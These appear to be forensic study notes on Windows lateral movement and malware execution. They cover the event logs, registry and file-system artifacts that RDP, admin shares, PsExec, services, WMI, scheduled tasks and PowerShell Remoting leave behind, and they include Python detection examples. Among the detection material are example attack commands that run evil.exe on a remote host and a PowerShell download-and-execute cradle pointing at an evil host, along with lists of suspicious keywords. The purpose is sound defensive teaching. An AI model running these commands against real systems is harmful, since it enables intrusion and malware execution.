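    (_t(9, 0), *HEARTBEAT),
    (_t(8, 52), "Security", 1102),
    (_t(8, 12), "Security", 4624),
]

if __name__ == "__main__":
    print("clears:", find_clear_events(SAMPLE_RECORDS))
    for a, b, length in find_gaps(SAMPLE_RECORDS):
        print(f"gap: no heartbeat between {a:%H:%M} and {b:%H:%M} ({length})")
```

The gap check only works if the heartbeat is forwarded off the host before an attacker can touch it; run it on the central copy, not on the endpoint.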


Lateral Movement


Copy Malware



Source

Destination

Remote Desktop Services

Hunt Evil: Lateral Movement Poster: Remote Desktop

mstsc /v:(Destination)


Source Event logs

Source | ID | Action
security.evtx | 4648 | Logon specifying alternate credentials (if NLA enabled on destination)
  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-TerminalServices-RDPClient%4Operational.evtx | 1024 | Destination Host Name
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-TerminalServices-RDPClient%4Operational.evtx | 1102 | Destination IP Address


Source Registry

Type | IOC | Remarks
NTUSER.DAT | Software\Microsoft\Terminal Server Client\Servers | Remote desktop destinations are tracked per user
ShimCache – SYSTEM | mstsc.exe | Remote Desktop Client
BAM/DAM – SYSTEM | mstsc.exe | Last Time Executed
AmCache.hve | mstsc.exe | First Time Executed
UserAssist – NTUSER.DAT | mstsc.exe | Last Time Executed; Number of Times Executed
RecentApps – NTUSER.DAT | mstsc.exe | Last Time Executed; Number of Times Executed; RecentItems subkey tracks connection destinations and times


Source File System

Type | IOC | Remarks
Jumplists | C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\{MSTSC-APPID}-automaticDestinations-ms | Tracks remote desktop connection destination and times
Prefetch | C:\Windows\Prefetch\mstsc.exe-{hash}.pf | first/last execution
Bitmap Cache | C:\Users\<user>\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache##.bmc and cache####.bin | Check bmc-tools


Target Event logs

Source | ID | Action
security.evtx | 4624 | Logon Type 10; Source IP/Logon User Name
security.evtx | 4778/4779 | IP Address of Source/Source System Name; Logon User Name
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx | 131 | Connection Attempts; Source IP
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx | 98 | Successful Connections
Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx | 1149 | Source IP/Logon User Name; a blank user name may indicate use of Sticky Keys
Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx | 21, 22, 25 | Source IP/Logon User Name
Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx | 41 | Logon User Name


Target Registry

Type IOC Remarks
ShimCache – SYSTEM rdpclip.exe
ShimCache – SYSTEM tstheme.exe
AmCache.hve rdpclip.exe
AmCache.hve tstheme.exe


Target File System

Type | IOC | Remarks
Prefetch | C:\Windows\Prefetch\rdpclip.exe-{hash}.pf and tstheme.exe-{hash}.pf | first/last execution


Source

Destination

Windows Admin Shares (C$ - ADMIN$ - IPC$)

Hunt Evil: Lateral Movement Poster:Map Network Shares


net use z: \\host\c$ /user:domain\username


C$ - Drive volume shares

ADMIN$ - %WINDOWSROOT%

IPC$ - Named Pipes

Source Event logs

Source | ID | Action
security.evtx | 4648 | Logon specifying alternate credentials
  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
Microsoft-Windows-SmbClient%4Security.evtx | 31001 | Failed logon to destination
  • Destination Host Name
  • User Name for failed logon
  • Reason code for failed destination logon (e.g. bad password)


Source Registry

Type | IOC | Remarks
MountPoints2 – NTUSER.DAT | Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 | Remotely mapped shares
Shellbags – UsrClass.dat | | Remote folders accessed inside an interactive session via Explorer by attackers
ShimCache – SYSTEM | net.exe, net1.exe |
BAM/DAM – SYSTEM | net.exe, net1.exe | Last Time Executed
AmCache.hve | net.exe, net1.exe | First Time Executed


Source File System

Type | IOC | Remarks
Prefetch | C:\Windows\Prefetch\net.exe-{hash}.pf and net1.exe-{hash}.pf | first/last execution
User Profile Artifacts | | Review shortcut files and jumplists for remote files accessed by attackers, if they had interactive access (RDP)


Target Event logs

Source | ID | Action
security.evtx | 4624 | Logon Type 3; Source IP/Logon User Name
security.evtx | 4672 | Logon User Name; logon by user with administrative rights; requirement for accessing default shares such as C$ and ADMIN$
security.evtx | 4776 | NTLM if authenticating to Local System; Source Host Name/Logon User Name
security.evtx | 4768 | TGT Granted; Source Host Name/Logon User Name (available only on domain controller)
security.evtx | 4769 | Service Ticket Granted if authenticating to Domain Controller; Destination Host Name/Logon User Name; Source IP (available only on domain controller)
security.evtx | 5140 | Share Access
security.evtx | 5145 | Auditing of shared files – NOISY



Target Registry

Type | IOC | Remarks
-

Target File System

Type | IOC | Remarks
File Creation | Attacker's files (malware) copied to destination system | Look for Modified Time before Creation Time; Creation Time is time of file copy

Execute Malware



Source

Destination

PsExec System Artifacts

Hunt Evil: Lateral Movement Poster: PsExec



psexec.exe \\host -accepteula -d -c c:\temp\evil.exe


Source Event logs

Source | ID | Action
security.evtx | 4648 | Logon specifying alternate credentials
  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name


Source Registry

Type | IOC | Remarks
NTUSER.DAT | Software\SysInternals\PsExec\EulaAccepted |
ShimCache – SYSTEM | psexec.exe |
BAM/DAM – SYSTEM | psexec.exe | Last Time Executed
AmCache.hve | psexec.exe | First Time Executed


Source File System

Type | IOC | Remarks
Prefetch | C:\Windows\Prefetch\psexec.exe-{hash}.pf | first/last execution; possible references to other files accessed by psexec.exe, such as executables copied to the target system with the "-c" option
File Creation | psexec.exe | file downloaded and created on the local host, as the file is not native to Windows


Target Event logs

Source | ID | Action
security.evtx | 4648 | Logon specifying alternate credentials
  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
security.evtx | 4624 | Logon Type 3 (and Type 2 if "-u" alternate credentials are used); Source IP/Logon User Name
security.evtx | 4672 | Logon User Name; logon by a user with administrative rights; PsExec requires access to default shares such as C$ and ADMIN$
security.evtx | 5140 | ADMIN$ share used by PsExec
security.evtx | 7045 | Service Install
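Correlating the destination-side events above into one PsExec-style detection, as an added example (not code from the notes or the SANS poster). The records are constructed dicts; 4624/4672/5140 follow the Security log field names and 7045 follows the System log (ServiceName, ImagePath), merged by time as a SIEM would. The rule fires when a type-3 logon is followed within a short window by an admin-rights logon and ADMIN$ access for the same Logon ID plus a service install whose binary sits in the system root; the path check is there so the "-r" renamed-service case in the Target Registry table is still caught.

```python
# Added example (not from the notes): correlating 4624/4672/5140/7045 on the
# destination into a PsExec-style lateral movement hit, over constructed records.
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(minutes=2)
ADMIN_SHARE = "\\\\*\\ADMIN$"          # ShareName as written in 5140


def _service_looks_pushed(ev):
    """7045 heuristic: default PsExec service name, or an image path under the system root."""
    name = ev["ServiceName"].lower()
    path = ev["ImagePath"].lower()
    return "psexesvc" in name or path.startswith("%systemroot%\\") or "\\windows\\" in path


def correlate_psexec(events, window=WINDOW):
    """Return one hit per type-3 logon that is followed, within the window, by
    4672 + 5140 ADMIN$ for the same TargetLogonId and a 7045 passing the heuristic."""
    evs = sorted(events, key=lambda e: e["TimeCreated"])
    hits = []
    for i, logon in enumerate(evs):
        if logon["EventID"] != 4624 or logon["LogonType"] != 3:
            continue
        lid, deadline = logon["TargetLogonId"], logon["TimeCreated"] + window
        admin_logon = admin_share = False
        service = None
        for ev in evs[i + 1:]:
            if ev["TimeCreated"] > deadline:
                break
            if ev["EventID"] == 4672 and ev["TargetLogonId"] == lid:
                admin_logon = True
            elif ev["EventID"] == 5140 and ev["TargetLogonId"] == lid and ev["ShareName"].upper() == ADMIN_SHARE:
                admin_share = True
            elif ev["EventID"] == 7045 and _service_looks_pushed(ev):
                service = (ev["ServiceName"], ev["ImagePath"])
        if admin_logon and admin_share and service:
            hits.append({"time": logon["TimeCreated"], "user": logon["TargetUserName"],
                         "source_ip": logon["IpAddress"], "logon_id": lid, "service": service})
    return hits


def _t(h, m, s):
    return datetime(2021, 6, 1, h, m, s, tzinfo=timezone.utc)


# Constructed records: a default PsExec run, a benign IPC$ connection with no
# service install, and a renamed-service run (the "-r" case).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": _t(9, 0, 0), "LogonType": 3, "TargetLogonId": "0xA1", "TargetUserName": "admin", "IpAddress": "10.0.0.7"},
    {"EventID": 4672, "TimeCreated": _t(9, 0, 0), "TargetLogonId": "0xA1"},
    {"EventID": 5140, "TimeCreated": _t(9, 0, 1), "TargetLogonId": "0xA1", "ShareName": "\\\\*\\ADMIN$"},
    {"EventID": 7045, "TimeCreated": _t(9, 0, 2), "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"EventID": 4624, "TimeCreated": _t(9, 10, 0), "LogonType": 3, "TargetLogonId": "0xB2", "TargetUserName": "svc_backup", "IpAddress": "10.0.0.20"},
    {"EventID": 4672, "TimeCreated": _t(9, 10, 0), "TargetLogonId": "0xB2"},
    {"EventID": 5140, "TimeCreated": _t(9, 10, 1), "TargetLogonId": "0xB2", "ShareName": "\\\\*\\IPC$"},
    {"EventID": 4624, "TimeCreated": _t(9, 20, 0), "LogonType": 3, "TargetLogonId": "0xC3", "TargetUserName": "ops", "IpAddress": "10.0.0.9"},
    {"EventID": 4672, "TimeCreated": _t(9, 20, 1), "TargetLogonId": "0xC3"},
    {"EventID": 5140, "TimeCreated": _t(9, 20, 1), "TargetLogonId": "0xC3", "ShareName": "\\\\*\\ADMIN$"},
    {"EventID": 7045, "TimeCreated": _t(9, 20, 3), "ServiceName": "UpdSvc", "ImagePath": "C:\\Windows\\updsvc.exe"},
]

if __name__ == "__main__":
    for hit in correlate_psexec(SAMPLE_EVENTS):
        print(hit)
```

5140 is only present if share auditing is enabled, and 4697 can stand in for 7045 where only the Security log is forwarded; both substitutions are a one-line change to the rule.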


Target Registry

Type | IOC | Remarks
New service creation | SYSTEM\CurrentControlSet\Services\PSEXESVC | "-r" option can allow attacker to rename service
ShimCache – SYSTEM | psexesvc.exe |
AmCache.hve | psexesvc.exe | First Time Executed


Target File System

Type | IOC | Remarks
Prefetch | C:\Windows\Prefetch\psexesvc.exe-{hash}.pf and evil.exe-{hash}.pf | first/last execution
File Creation | psexesvc.exe, evil.exe | User profile directory structure created unless "-e" option used; psexesvc.exe will be placed in ADMIN$ (\Windows) by default, as well as other executables (evil.exe) pushed by PsExec


Source

Destination

Windows Remote Management Tools: Remote Services

Hunt Evil: Lateral Movement Poster: Services



sc \\host create servicename binpath= "c:\temp\evil.exe"
sc \\host start servicename


Source Event logs

Source | ID | Action
-

Source Registry

Type | IOC | Remarks
ShimCache – SYSTEM | sc.exe |
AmCache.hve | sc.exe | First Time Executed


Source File System

Type | IOC | Remarks
Prefetch | C:\Windows\Prefetch\sc.exe-{hash}.pf | first/last execution


Target Event logs

Source | ID | Action
security.evtx | 4624 | Logon Type 3 (and Type 2 if "-u" alternate credentials are used); Source IP/Logon User Name
security.evtx | 4697 | Security log records service install, if enabled; enabling non-default Security events such as ID 4697 is particularly useful if only the Security logs are forwarded to a centralized log server
system.evtx | 7034 | Service crashed unexpectedly
system.evtx | 7035 | Service sent a Start/Stop control
system.evtx | 7036 | Service started or stopped
system.evtx | 7040 | Start type changed (Boot / On Request / Disabled)
system.evtx | 7045 | A service was installed on the system


Target Registry

Type | IOC | Remarks
New service creation | SYSTEM\CurrentControlSet\Services\ |
ShimCache – SYSTEM | evil.exe | ShimCache records existence of malicious service executable, unless implemented as a service DLL
AmCache.hve | evil.exe | First Time Executed


Target File System

Type | IOC | Remarks
Prefetch | C:\Windows\Prefetch\evil.exe-{hash}.pf | first/last execution
File Creation | evil.exe or evil.dll | malicious service executable or service DLL


Source

Destination

Windows Remote Management Tools: WMI/WMIC

Hunt Evil: Lateral Movement Poster: WMI/WMIC

 
wmic /node:host process call create "C:\temp\evil.exe"
Invoke-WmiMethod -Computer host -Class Win32_Process -Name create -Argument "c:\temp\evil.exe"


Source Event logs

Source | ID | Action
security.evtx | 4648 | Logon specifying alternate credentials
  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
security.evtx | 4697 | Security log records service install, if enabled; enabling non-default Security events such as ID 4697 is particularly useful if only the Security logs are forwarded to a centralized log server


Source Registry

Type | IOC | Remarks
ShimCache – SYSTEM | wmic.exe |
BAM/DAM – SYSTEM | wmic.exe | Last Time Executed
AmCache.hve | wmic.exe | First Time Executed




Source File System

Type | IOC | Remarks
Prefetch | C:\Windows\Prefetch\wmic.exe-{hash}.pf | first/last execution


Target Event logs

Source | ID | Action
security.evtx | 4624 | Logon Type 3; Source IP/Logon User Name
security.evtx | 4672 | Logon User Name; logon by a user with administrative rights
Microsoft-Windows-WMI-Activity%4Operational.evtx | 5857 | Indicates time of wmiprvse execution and path to provider DLL; attackers sometimes install malicious WMI provider DLLs
Microsoft-Windows-WMI-Activity%4Operational.evtx | 5860, 5861 | Registration of Temporary (5860) and Permanent (5861) Event Consumers. Typically used for persistence, but can be used for remote execution.


Target Registry

Type | IOC | Remarks
ShimCache – SYSTEM | wmiprvse.exe, evil.exe, mofcomp.exe |
AmCache.hve | wmiprvse.exe, evil.exe, mofcomp.exe | First Time Executed


Target File System

Type | IOC | Remarks
Prefetch | C:\Windows\Prefetch\evil.exe-{hash}.pf, wmiprvse.exe-{hash}.pf, mofcomp.exe-{hash}.pf | first/last execution
File Creation | evil.exe, evil.mof | .mof files can be used to manage the WMI Repository
Changes in | C:\Windows\System32\wbem\Repository | Unauthorized changes to the WMI Repository


Windows Remote Management Tools: Scheduled Tasks

Hunt Evil: Lateral Movement Poster: Scheduled Tasks

at \\host 13:00 "c:\temp\evil.exe"
schtasks /CREATE /TN taskname /TR c:\temp\evil.exe /SC once /RU "SYSTEM" /ST 13:00 /S host /U username


Source Event logs

Source ID Action
security.evtx 4648: Logon specifying alternate credentials
  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
security.evtx 4697
  • Security log records service installs, if enabled
  • Enabling non-default Security events such as ID 4697 is particularly useful if only the Security logs are forwarded to a centralized log server


Source Registry

Type IOC Remarks
ShimCache – SYSTEM
  • at.exe
  • schtasks.exe
BAM/DAM – SYSTEM (Last Time Executed)
  • at.exe
  • schtasks.exe
AmCache.hve (First Time Executed)
  • at.exe
  • schtasks.exe




Source File System

Type IOC Remarks
Prefetch: C:\Windows\Prefetch\ (first/last execution)
  • at.exe-{hash}.pf
  • schtasks.exe-{hash}.pf


Target Event logs

Source ID Action
security.evtx 4624: Logon Type 3
  • Source IP/Logon User Name
security.evtx 4672
  • Logon User Name
  • Logon by a user with administrative rights
Microsoft-Windows-WMI-Activity%4Operational.evtx 5857
  • Indicates time of wmiprvse execution and path to provider DLL; attackers sometimes install malicious WMI provider DLLs
Microsoft-Windows-WMI-Activity%4Operational.evtx 5860, 5861
  • Registration of Temporary (5860) and Permanent (5861) Event Consumers. Typically used for persistence, but can be used for remote execution.


Target Registry

Type IOC Remarks
SOFTWARE
  • Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks
  • Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\
ShimCache – SYSTEM
  • evil.exe
AmCache.hve (First Time Executed)
  • evil.exe


Target File System

Type IOC Remarks
Prefetch: C:\Windows\Prefetch\ (first/last execution)
  • evil.exe-{hash}.pf
File Creation
  • evil.exe
  • Job files created in C:\Windows\Tasks
  • XML task files created in C:\Windows\System32\Tasks
  • Author tag under "RegistrationInfo" can identify the source system name and the creator username
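As an added Python example (not part of the FOR508 notes or the poster), the following reads a task XML of the kind written to C:\Windows\System32\Tasks, pulls out the RegistrationInfo Author and splits it into source system and creator username, and also returns the run-as principal and the Exec command. The task document is constructed for illustration (the Author "ATTACKHOST\jdoe" is made up); `load_task_file` assumes the on-disk files are UTF-16, which is how Task Scheduler writes them.

```python
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace (the same one appears in every file under System32\Tasks)
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task document, not a real artifact: the author "ATTACKHOST\jdoe" stands for the
# "source system\creator" form the poster describes, and the action runs the poster's evil.exe
CONSTRUCTED_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2019-03-04T13:00:00</Date>
    <Author>ATTACKHOST\\jdoe</Author>
  </RegistrationInfo>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>c:\\temp\\evil.exe</Command>
    </Exec>
  </Actions>
</Task>"""

def parse_task_xml(xml_text):
    """Extract the fields a hunter checks first from one task definition."""
    root = ET.fromstring(xml_text)

    def text(path):
        node = root.find(path, NS)
        return node.text.strip() if node is not None and node.text else None

    author = text("t:RegistrationInfo/t:Author")
    # "HOST\user" or "DOMAIN\user": the part before the backslash names where the task came from
    source, _, creator = (author or "").rpartition("\\")
    return {
        "author": author,
        "source_system": source or None,
        "creator": creator or None,
        "registered": text("t:RegistrationInfo/t:Date"),
        "run_as": text("t:Principals/t:Principal/t:UserId"),  # S-1-5-18 is SYSTEM
        "command": text("t:Actions/t:Exec/t:Command"),
        "arguments": text("t:Actions/t:Exec/t:Arguments"),
    }

def load_task_file(path):
    """Read a task file from an image or export; Task Scheduler writes them as UTF-16 with BOM."""
    with open(path, encoding="utf-16") as handle:
        return parse_task_xml(handle.read())
```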



Windows Remote Management Tools: PowerShell Remoting

Hunt Evil: Lateral Movement Poster: PowerShell Remoting

Enter-PSSession -ComputerName host
Invoke-Command -ComputerName host -ScriptBlock {Start-Process c:\temp\evil.exe}


Source Event logs

Source ID Action
security.evtx 4648: Logon specifying alternate credentials
  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
Microsoft-Windows-WinRM%4Operational.evtx 6: WSMan Session initialize
  • Session created
  • Destination Host Name or IP
  • Current logged-on User Name
Microsoft-Windows-WinRM%4Operational.evtx 8, 15, 16, 33: WSMan Session deinitialization
  • Closing of WSMan session
  • Current logged-on User Name
Microsoft-Windows-PowerShell%4Operational.evtx 40961, 40962
  • Records the local initiation of powershell.exe and the associated user account
Microsoft-Windows-PowerShell%4Operational.evtx 8193, 8194
  • Session created
Microsoft-Windows-PowerShell%4Operational.evtx 8197: Connect
  • Session closed


Source Registry

Type IOC Remarks
ShimCache – SYSTEM
  • powershell.exe
BAM/DAM – SYSTEM (Last Time Executed)
  • powershell.exe
AmCache.hve (First Time Executed)
  • powershell.exe



Source File System

Type IOC Remarks
Prefetch: C:\Windows\Prefetch\ (first/last execution)
  • powershell.exe-{hash}.pf
  • PowerShell scripts (.ps1 files) that run within 10 seconds of powershell.exe launching will be tracked in the powershell.exe prefetch file
Command history: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
  • ConsoleHost_history.txt
  • With PS v5+, a history file with the previous 4096 commands is maintained per user


Target Event logs

Source ID Action
security.evtx 4624: Logon Type 3
  • Source IP/Logon User Name
security.evtx 4672
  • Logon User Name
  • Logon by a user with administrative rights
Microsoft-Windows-PowerShell%4Operational.evtx 4103, 4104: Script Block logging
  • Logs suspicious scripts by default in PS v5
  • Logs all scripts if configured
Microsoft-Windows-PowerShell%4Operational.evtx 53504
  • Records the authenticating user
Windows PowerShell.evtx 400, 403
  • "ServerRemoteHost" indicates start/end of a Remoting session
Windows PowerShell.evtx 800
  • Includes partial script code
Microsoft-Windows-WinRM%4Operational.evtx 91
  • Session creation
Microsoft-Windows-WinRM%4Operational.evtx 168
  • Records the authenticating user



Target Registry

Type IOC Remarks
ShimCache – SYSTEM
  • wsmprovhost.exe
  • evil.exe
AmCache.hve (First Time Executed)
  • wsmprovhost.exe
  • evil.exe
SOFTWARE
  • Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy
  • Attacker may change the execution policy to a less restrictive setting, such as "bypass"


Target File System

Type IOC Remarks
Prefetch: C:\Windows\Prefetch\ (first/last execution)
  • evil.exe-{hash}.pf
  • wsmprovhost.exe-{hash}.pf
File Creation
  • evil.exe
  • With Enter-PSSession, a user profile directory may be created


Evidence of Malware Execution

Event Logs

Correlate event logs and AV logs to filter out noise.

Identify potential malware and determine whether it was executed:

Source ID Action
system.evtx 1001
  • WER (Windows Error Reporting) entries
application.evtx 1000, 1001, 1002
  • Application Errors and Hangs (indication of an attempted buffer overflow)

Identify potential execution and record the full command line used to launch a process (Win7+):

Source ID Action
security.evtx 4688
  • New process created
security.evtx 4689
  • Process exit
security.evtx 4624
  • Logon Type 3 immediately before the 4688

Enable: gpedit → Comp. config → Policies → Admin. templates → System → Audit Process Creation
http://for508.com/uhat4
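The "4624 Type 3 immediately before a 4688" correlation, as an added Python example that is not part of the notes: it joins the two events on the logon ID both carry (4624 TargetLogonId, 4688 SubjectLogonId) and requires the network logon to fall within a short window before the process start. The event records are constructed with a subset of the real fields, and the 60-second window is an assumed default.

```python
from datetime import datetime, timedelta

# Constructed Security event records (field names follow the real events, values are made up)
CONSTRUCTED_EVENTS = [
    # network logon from 10.0.0.5, then a process start one second later under the same logon ID
    {"id": 4624, "time": "2019-03-04T13:00:01", "LogonType": 3, "TargetLogonId": "0x3e7b1",
     "TargetUserName": "jdoe", "IpAddress": "10.0.0.5"},
    {"id": 4688, "time": "2019-03-04T13:00:02", "SubjectLogonId": "0x3e7b1",
     "NewProcessName": "C:\\temp\\evil.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},
    # console logon (type 2) followed by a process start: local activity, not a hit
    {"id": 4624, "time": "2019-03-04T13:05:00", "LogonType": 2, "TargetLogonId": "0x1a2b3",
     "TargetUserName": "alice", "IpAddress": "-"},
    {"id": 4688, "time": "2019-03-04T13:05:03", "SubjectLogonId": "0x1a2b3",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "ParentProcessName": "C:\\Windows\\explorer.exe"},
    # network logon with no process start under its logon ID: not a hit
    {"id": 4624, "time": "2019-03-04T09:00:00", "LogonType": 3, "TargetLogonId": "0x9f9f9",
     "TargetUserName": "svc_backup", "IpAddress": "10.0.0.9"},
]

def parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S")

def network_launched_processes(events, window=timedelta(seconds=60)):
    """Return one hit per 4688 whose logon ID belongs to a type-3 4624 that precedes it within `window`."""
    # index network logons by the logon ID that the later 4688 will reference
    logons = {}
    for ev in events:
        if ev["id"] == 4624 and ev["LogonType"] == 3:
            logons.setdefault(ev["TargetLogonId"], []).append(ev)
    hits = []
    for ev in events:
        if ev["id"] != 4688:
            continue
        started = parse_time(ev["time"])
        for logon in logons.get(ev["SubjectLogonId"], []):
            delta = started - parse_time(logon["time"])
            if timedelta(0) <= delta <= window:
                hits.append({"user": logon["TargetUserName"], "source_ip": logon["IpAddress"],
                             "process": ev["NewProcessName"], "parent": ev["ParentProcessName"],
                             "seconds_after_logon": delta.total_seconds()})
    return hits
```

The same join works on events exported with Get-WinEvent as long as the EventData fields are carried over with these names.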


Identify PowerShell activity including pipeline output and full script content (Win10, PS5):

Source ID Action
PS command history: %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • By default, in Windows 10, the last 4096 typed commands. The history is stored separately for PowerShell and ISE.
Microsoft-Windows-PowerShell/Operational 4103
  • Module logging
Microsoft-Windows-PowerShell/Operational 4104
  • Script block logging
Microsoft-Windows-PowerShell/Operational 4105, 4106
  • Start Script: ignore as very noisy
Powershell.evtx 400, 800
  • Not very useful, but you never know...

Enable: gpedit → Comp. config → Policies → Admin. templates → Windows Components → PowerShell

Why to look for "older" PowerShell executions:

This capability was introduced with PowerShell v5 in Windows 10. It is based on the third-party module PSReadLine, which is not included in the separately installed PowerShell 5 for previous versions of Windows.

For the same reason, watch for the "downgrade" to an older engine: powershell -Version 2 -Command <...>

Look for suspicious strings:

  • IEX (New-Object Net.WebClient).DownloadString("http://evil.ps1")
  • download
  • Start-Process
  • FromBase64String
  • rundll32
  • IEX
  • Invoke-Expression
  • WebClient
  • powershell -version
  • http
  • bitstransfer

Check for obfuscation (use entropy/frequency detection).

Enable transcript logs, although they are only written to the user folder:
gpedit → Comp. config → Policies → Admin. templates → Windows Components → PowerShell



Auditing WMI persistence

Source ID Action
security.evtx 5857-5861
  • Consumer activity
security.evtx 5861
  • New permanent event consumer created
WMI-Activity/Operational
  • Enabled by default on W10/2012R2+

Look for suspicious strings:

  • CommandLine
  • ActiveScript
  • scrcons
  • wbemcons
  • powershell
  • eval
  • .vbs
  • .ps1
  • ActiveXObject
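The two indicator lists above (the PowerShell strings and the WMI consumer strings) together with the entropy/frequency check for obfuscation, as one added Python example that is not part of the notes: it scans exported ConsoleHost_history.txt lines, or the consumer text taken from 5861 events, and reports matched strings and an obfuscation flag per line. The sample lines are constructed, and the entropy threshold, the tick/concatenation counts and the Base64 run length are assumed cut-offs, not values from the course.

```python
import math
import re

# Indicator lists from the notes above, lower-cased for case-insensitive matching
PS_INDICATORS = ["download", "start-process", "frombase64string", "rundll32", "iex",
                 "invoke-expression", "webclient", "powershell -version", "http", "bitstransfer"]
WMI_INDICATORS = ["commandline", "activescript", "scrcons", "wbemcons", "powershell",
                  "eval", ".vbs", ".ps1", "activexobject"]
ENTROPY_THRESHOLD = 5.5                        # bits/char, assumed; random-looking blobs approach 6
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # a long Base64-looking token (assumed length)

def shannon_entropy(text):
    """Shannon entropy in bits per character (0.0 for an empty or single-symbol string)."""
    n = len(text)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in (text.count(s) for s in set(text)))

def looks_obfuscated(line):
    """Frequency heuristics: tick/caret insertion, string concatenation, or blob-like text."""
    ticks = line.count("`") + line.count("^")
    concats = line.count("'+'") + line.count('"+"')
    return (ticks >= 3 or concats >= 2 or bool(BASE64_RUN.search(line))
            or shannon_entropy(line) > ENTROPY_THRESHOLD)

def scan_lines(lines, indicators):
    """One finding per line that contains an indicator string or looks obfuscated."""
    findings = []
    for number, line in enumerate(lines, start=1):
        lowered = line.lower()
        matched = [ind for ind in indicators if ind in lowered]
        obfuscated = looks_obfuscated(line)
        if matched or obfuscated:
            findings.append({"line": number, "indicators": matched,
                             "obfuscated": obfuscated, "text": line})
    return findings

# Constructed ConsoleHost_history.txt lines (not from a real system)
CONSTRUCTED_HISTORY = [
    "Get-ChildItem C:\\Users -Recurse | Select-Object Name",
    "IEX (New-Object Net.WebClient).DownloadString('http://evil.example/evil.ps1')",
    "&('In'+'voke-Ex'+'pression') (Get-Content .\\stage2.txt)",
    "i`e`x (n`ew-obj`ect n`et.w`ebc`lient).d`ownloadstr`ing('http://evil.example/a')",
    "powershell -enc " + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" * 2,
]
# Constructed consumer text of the kind found in 5861 events; the last one is the benign default
CONSTRUCTED_WMI_CONSUMERS = [
    'CommandLineEventConsumer.Name="Updater",CommandLineTemplate="powershell -nop -w hidden -e ..."',
    'ActiveScriptEventConsumer.Name="Cleanup",ScriptingEngine="VBScript",ScriptText="...ActiveXObject..."',
    'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
]
```

Run `scan_lines(CONSTRUCTED_HISTORY, PS_INDICATORS)` and `scan_lines(CONSTRUCTED_WMI_CONSUMERS, WMI_INDICATORS)` to see which sample lines are reported and why; Base64-encoded `-enc` payloads are caught by the token-length rule even where their entropy stays low.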

Extracting Event Logs

Live system

On Vista+ and 2008+, use Sysinternals PsTools; they can be run from your forensic workstation and connect to the suspicious machine over the network, which avoids heavily tainting your evidence.

Get-WinEvent -FilterHashtable @{LogName="Security"; Id=4624} | Where-Object { $_.Message -match "what ever" }
Get-WinEvent -ComputerName host -FilterHashtable @{LogName="Security"; Id=4624} | Where-Object { $_.Message -match "what ever" }

Use the PowerShell scripts included in the SANS SEC505 course (see Day 6).

SYSMON

Deploy Sysmon (with -n -l -i) wherever possible.

Logs to: Applications and Services Logs/Microsoft/Windows/Sysmon/Operational

psexec \\remote-pc -u "DOMAIN\Administrator" -p "password" cmd /c "msiexec.exe /i \\server\share\application.msi /quiet /norestart"

  • Event ID 1: Process creation
  • Event ID 2: A process changed a file creation time
  • Event ID 3: Network connection
  • Event ID 4: Sysmon service state changed
  • Event ID 5: Process terminated
  • Event ID 6: Driver loaded
  • Event ID 7: Image loaded
  • Event ID 8: CreateRemoteThread
  • Event ID 9: RawAccessRead
  • Event ID 10: ProcessAccess
  • Event ID 11: FileCreate
  • Event ID 12: RegistryEvent (Object create and delete)

Offline system

Use a commercial forensic tool (FTK, EnCase) or Autopsy to carve.
TZWorks maintains a tool, EVTXtract.

Get-WinEvent -FilterHashtable @{Path="C:\where you put the*.evtx"; Id=4624} | Where-Object { $_.Message -match "what ever" }